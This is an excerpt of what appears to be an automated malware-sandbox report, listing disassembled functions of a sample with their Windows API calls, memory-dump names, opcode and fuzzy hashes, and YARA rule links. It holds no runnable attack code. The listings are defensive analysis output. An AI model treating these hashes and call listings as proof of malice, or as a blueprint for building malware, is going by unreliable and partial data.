                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
                                                                                                                                                      • String ID: x3`$x3`$x3`
                                                                                                                                                      • API String ID: 1072379062-2244824962
                                                                                                                                                      • Opcode ID: ec44859d7d5c1848d72c4ce3ee9f38509066765ef6b8130775143e825c5d3a9b
                                                                                                                                                      • Instruction ID: b9fd30f81734e98388483f1173162783f58442ebd855ff815697d2bb17d649cc
                                                                                                                                                      • Opcode Fuzzy Hash: ec44859d7d5c1848d72c4ce3ee9f38509066765ef6b8130775143e825c5d3a9b
                                                                                                                                                      • Instruction Fuzzy Hash: B5C16A75A0010AAFDB24DF58C895EFABBB9FF48300F148429F905AB291DB74ED45CB90
                                                                                                                                                      Function 005C4D75 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,005CDCD0,00000000,?,?,?,?), ref: 005C4E09
                                                                                                                                                      • GetWindowLongW.USER32 ref: 005C4E26
                                                                                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 005C4E36
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Window$Long
                                                                                                                                                      • String ID: SysTreeView32
                                                                                                                                                      • API String ID: 847901565-1698111956
                                                                                                                                                      • Opcode ID: c810c409c732af125a146db20b25ba2fd0e81aefe85d3fdcc10be70650dcbe23
                                                                                                                                                      • Instruction ID: 64d35d1cbce12a90e45159107d9de49e1306cb70f956cfecda7618f05447de32
                                                                                                                                                      • Opcode Fuzzy Hash: c810c409c732af125a146db20b25ba2fd0e81aefe85d3fdcc10be70650dcbe23
                                                                                                                                                      • Instruction Fuzzy Hash: 8B315E3110060AAFDF219EB8CC55FEA7BA9FB58334F254729F975D21D0D770A8509B50
                                                                                                                                                      Function 005C4817 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 005C489F
                                                                                                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 005C48B3
                                                                                                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 005C48D7
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MessageSend$Window
                                                                                                                                                      • String ID: SysMonthCal32
                                                                                                                                                      • API String ID: 2326795674-1439706946
                                                                                                                                                      • Opcode ID: 7cd0dc37ae08302471452afc5ebc90745ed5297585f000ca889bed73d659958b
                                                                                                                                                      • Instruction ID: 45f5f7fc2af52be0236fb5d7e42211e749cffcb1150bd85f0861dd43126bdb7b
                                                                                                                                                      • Opcode Fuzzy Hash: 7cd0dc37ae08302471452afc5ebc90745ed5297585f000ca889bed73d659958b
                                                                                                                                                      • Instruction Fuzzy Hash: 58219132500219AFDF158F90CC46FEA3F79FF88724F150118FA15AB1D0D6B5A8559BA0
                                                                                                                                                      Function 005C4116 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 005C419F
                                                                                                                                                      • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 005C41AF
                                                                                                                                                      • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 005C41D5
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MessageSend$MoveWindow
                                                                                                                                                      • String ID: Listbox
                                                                                                                                                      • API String ID: 3315199576-2633736733
                                                                                                                                                      • Opcode ID: 72b70d4af00f22b7d4f62d4653e2d3f043372c785ffd5969f23d6c041a867718
                                                                                                                                                      • Instruction ID: 306f0b91ec41a8ff71bfd3445f765f552382bf0db14db66af376c9d3721cba39
                                                                                                                                                      • Opcode Fuzzy Hash: 72b70d4af00f22b7d4f62d4653e2d3f043372c785ffd5969f23d6c041a867718
                                                                                                                                                      • Instruction Fuzzy Hash: 1F21A132610118BFDF218F94DC44FBB3BAEFB99750F048118FA449B190C6719C92CBA0
                                                                                                                                                      Function 005C4B4A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 005C4BAE
                                                                                                                                                      • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 005C4BC3
                                                                                                                                                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 005C4BD0
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                      • String ID: msctls_trackbar32
                                                                                                                                                      • API String ID: 3850602802-1010561917
                                                                                                                                                      • Opcode ID: 3f18123be87a9d3b1714507d2e5a63a9ba32caf59946943b75a1f25a5eaf40e9
                                                                                                                                                      • Instruction ID: d5141343ec3751ee223e4678771b644d6061fc8e255b9ed5fdbec979be503a3d
                                                                                                                                                      • Opcode Fuzzy Hash: 3f18123be87a9d3b1714507d2e5a63a9ba32caf59946943b75a1f25a5eaf40e9
                                                                                                                                                      • Instruction Fuzzy Hash: F111E331240208BEEF215FA4CC06FAB7BACFF85B28F114518FA55E60A0D671DC219B20
                                                                                                                                                      Function 005C61E1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 005C6220
                                                                                                                                                      • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 005C624D
                                                                                                                                                      • DrawMenuBar.USER32(?), ref: 005C625C
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Menu$InfoItem$Draw
                                                                                                                                                      • String ID: 0
                                                                                                                                                      • API String ID: 3227129158-4108050209
                                                                                                                                                      • Opcode ID: 80c62dd772bcb59e6e41081c54a036dfb1836e2cf82078deccead6172fd4c177
                                                                                                                                                      • Instruction ID: 53a3696dd5798e273c8b5f6d9e1071302da08c9b84789abc131886bcc0f7422a
                                                                                                                                                      • Opcode Fuzzy Hash: 80c62dd772bcb59e6e41081c54a036dfb1836e2cf82078deccead6172fd4c177
                                                                                                                                                      • Instruction Fuzzy Hash: E3016975500618AFDB209F91DC88FAEBFB4FF84351F1480AAF849D6151DB308A98EF21
                                                                                                                                                      Function 005C8162 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41windowCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • GetForegroundWindow.USER32(?,006028B0,005CACC3,000000FC,?,00000000,00000000,?), ref: 005C8164
                                                                                                                                                      • GetFocus.USER32 ref: 005C816C
                                                                                                                                                        • Part of subcall function 00532441: GetWindowLongW.USER32(00000000,000000EB), ref: 00532452
                                                                                                                                                        • Part of subcall function 005321E4: GetWindowLongW.USER32(?,000000EB), ref: 005321F2
                                                                                                                                                      • SendMessageW.USER32(?,000000B0,000001BC,000001C0), ref: 005C81D9
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Window$Long$FocusForegroundMessageSend
                                                                                                                                                      • String ID: Hb
                                                                                                                                                      • API String ID: 3601265619-1270690246
                                                                                                                                                      • Opcode ID: 943d7aa9ac7af4ce0fad70baa530560f169915c1aa00d6271a12c25f32437285
                                                                                                                                                      • Instruction ID: 465767ddd010500627c990988c7e72b7d162204a229b3be0e68e3fc225221e72
                                                                                                                                                      • Opcode Fuzzy Hash: 943d7aa9ac7af4ce0fad70baa530560f169915c1aa00d6271a12c25f32437285
                                                                                                                                                      • Instruction Fuzzy Hash: 5F015E312009118FC72ADB69DC58F763BF6FF8A324F18026EE815872A0DB316D46CB10
                                                                                                                                                      Function 0059090F Relevance: 6.3, APIs: 4, Instructions: 322COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 3b8c056a38a8c710cf27ee7d03187272390c7503b3828638a97c622ea8ada5ea
                                                                                                                                                      • Instruction ID: d66a30e5be02a811aa060a1764ef4a0b5d8f9593bfd296667e594777b3c71f25
                                                                                                                                                      • Opcode Fuzzy Hash: 3b8c056a38a8c710cf27ee7d03187272390c7503b3828638a97c622ea8ada5ea
                                                                                                                                                      • Instruction Fuzzy Hash: 7EC16C75A0021AEFDB14CF94C894EAEBBB5FF88704F109998E505EB291D731ED81DB90
                                                                                                                                                      Function 00564210 Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: __alldvrm$_strrchr
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1036877536-0
                                                                                                                                                      • Opcode ID: 173a905e0583d248f4586312a6838000a577cfe73f6efb9ac5c35750ff0a0cfb
                                                                                                                                                      • Instruction ID: d2d345778c2e52e1f3caa1a1c6f1472d8b89859ef22e2b84335a29f186a4e346
                                                                                                                                                      • Opcode Fuzzy Hash: 173a905e0583d248f4586312a6838000a577cfe73f6efb9ac5c35750ff0a0cfb
                                                                                                                                                      • Instruction Fuzzy Hash: 7DA13672A043869FDB25CF58C8927AEBFE5FF55310F288569E5859B382CB348D81CB50
                                                                                                                                                      Function 00590CC6 Relevance: 6.2, APIs: 4, Instructions: 230COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,005D0BD4,?), ref: 00590E80
                                                                                                                                                      • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,005D0BD4,?), ref: 00590E98
                                                                                                                                                      • CLSIDFromProgID.OLE32(?,?,00000000,005CDCE0,000000FF,?,00000000,00000800,00000000,?,005D0BD4,?), ref: 00590EBD
                                                                                                                                                      • _memcmp.LIBVCRUNTIME ref: 00590EDE
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FromProg$FreeTask_memcmp
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 314563124-0
                                                                                                                                                      • Opcode ID: ee19389909806e0bd6afd993588e57c4e2554dff62ea8ec8e34b2932adc579a7
                                                                                                                                                      • Instruction ID: 4fdcb195e302c5cc2e5c701e5882cbce863379c3af2ddff1d3403fba5f4a927c
                                                                                                                                                      • Opcode Fuzzy Hash: ee19389909806e0bd6afd993588e57c4e2554dff62ea8ec8e34b2932adc579a7
                                                                                                                                                      • Instruction Fuzzy Hash: 5881FC75A00109EFCF04DF94C984EEEBBB9FF89315F204959E516AB250DB71AE06CB60
                                                                                                                                                      Function 005B2433 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • socket.WSOCK32(00000002,00000002,00000011), ref: 005B245A
                                                                                                                                                      • WSAGetLastError.WSOCK32 ref: 005B2468
                                                                                                                                                      • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 005B24E7
                                                                                                                                                      • WSAGetLastError.WSOCK32 ref: 005B24F1
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorLast$socket
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1881357543-0
                                                                                                                                                      • Opcode ID: ef79008e06f619c127d7b6fd273ef86856bad4ea8777e7a80a341cf03f3b0efe
                                                                                                                                                      • Instruction ID: 02293f23491f545a4dbfb2468a86861a70523e1dd7e8cefc14c5b8dc8db12a0e
                                                                                                                                                      • Opcode Fuzzy Hash: ef79008e06f619c127d7b6fd273ef86856bad4ea8777e7a80a341cf03f3b0efe
                                                                                                                                                      • Instruction Fuzzy Hash: 1D41E274600601AFE720AF24C89AF6A7BE4FB44718F54C458F9199F6D2C772ED428BA0
                                                                                                                                                      Function 005A6033 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 005A60DD
                                                                                                                                                      • GetLastError.KERNEL32(?,00000000), ref: 005A6103
                                                                                                                                                      • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 005A6128
                                                                                                                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 005A6154
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3321077145-0
                                                                                                                                                      • Opcode ID: 02c2e20bf31e436b65de1e141dbce3f98d4957a1aed98b204dd5f13cddf66d18
                                                                                                                                                      • Instruction ID: c47ba9cb22e368a1ce24ac7cc271a5e5e656b66149a1a4846383177a97523856
                                                                                                                                                      • Opcode Fuzzy Hash: 02c2e20bf31e436b65de1e141dbce3f98d4957a1aed98b204dd5f13cddf66d18
                                                                                                                                                      • Instruction Fuzzy Hash: 76410639600A11DFCB15EF15C449A5EBBE6FF89710B198488F84AAB362CB30FD41DB91
                                                                                                                                                      Function 005C2039 Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • GetForegroundWindow.USER32 ref: 005C204A
                                                                                                                                                        • Part of subcall function 005942CC: GetWindowThreadProcessId.USER32(?,00000000), ref: 005942E6
                                                                                                                                                        • Part of subcall function 005942CC: GetCurrentThreadId.KERNEL32 ref: 005942ED
                                                                                                                                                        • Part of subcall function 005942CC: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00592E43), ref: 005942F4
                                                                                                                                                      • GetCaretPos.USER32(?), ref: 005C205E
                                                                                                                                                      • ClientToScreen.USER32(00000000,?), ref: 005C20AB
                                                                                                                                                      • GetForegroundWindow.USER32 ref: 005C20B1
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2759813231-0
                                                                                                                                                      • Opcode ID: ca53d387a509ca3c94973887a69eb70b1ebb41835d586af7d8d1edfd5b1060f2
                                                                                                                                                      • Instruction ID: f991c3e692d53d8a4cf8c40689deba40b5560075f6c182749884f6a71b4d290c
                                                                                                                                                      • Opcode Fuzzy Hash: ca53d387a509ca3c94973887a69eb70b1ebb41835d586af7d8d1edfd5b1060f2
                                                                                                                                                      • Instruction Fuzzy Hash: 00314371D00209AFCB04DFA6C885DAEBBF8FF98314B54846AE515E7251DA71EE05CBA0
                                                                                                                                                      Function 0059E7C1 Relevance: 6.1, APIs: 4, Instructions: 87COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00534154: _wcslen.LIBCMT ref: 00534159
                                                                                                                                                      • _wcslen.LIBCMT ref: 0059E7F7
                                                                                                                                                      • _wcslen.LIBCMT ref: 0059E80E
                                                                                                                                                      • _wcslen.LIBCMT ref: 0059E839
                                                                                                                                                      • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0059E844
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _wcslen$ExtentPoint32Text
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3763101759-0
                                                                                                                                                      • Opcode ID: 236ba5ff12c540e7677b43f93592d1050846861d778de7ef25113e64b8c8cff1
                                                                                                                                                      • Instruction ID: a2b8d0465fe8ff82606137776edbc7c2dfb488ee141f7c0c1b8b041e0d6e0720
                                                                                                                                                      • Opcode Fuzzy Hash: 236ba5ff12c540e7677b43f93592d1050846861d778de7ef25113e64b8c8cff1
                                                                                                                                                      • Instruction Fuzzy Hash: 8421A171D00615AFCB11EFA8C986BAEBFF8FF85751F144065EC04AB281D6749E41CBA1
                                                                                                                                                      Function 00598184 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0059960C: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00598199,?,000000FF,?,00598FE3,00000000,?,0000001C,?,?), ref: 0059961B
                                                                                                                                                        • Part of subcall function 0059960C: lstrcpyW.KERNEL32(00000000,?,?,00598199,?,000000FF,?,00598FE3,00000000,?,0000001C,?,?,00000000), ref: 00599641
                                                                                                                                                        • Part of subcall function 0059960C: lstrcmpiW.KERNEL32(00000000,?,00598199,?,000000FF,?,00598FE3,00000000,?,0000001C,?,?), ref: 00599672
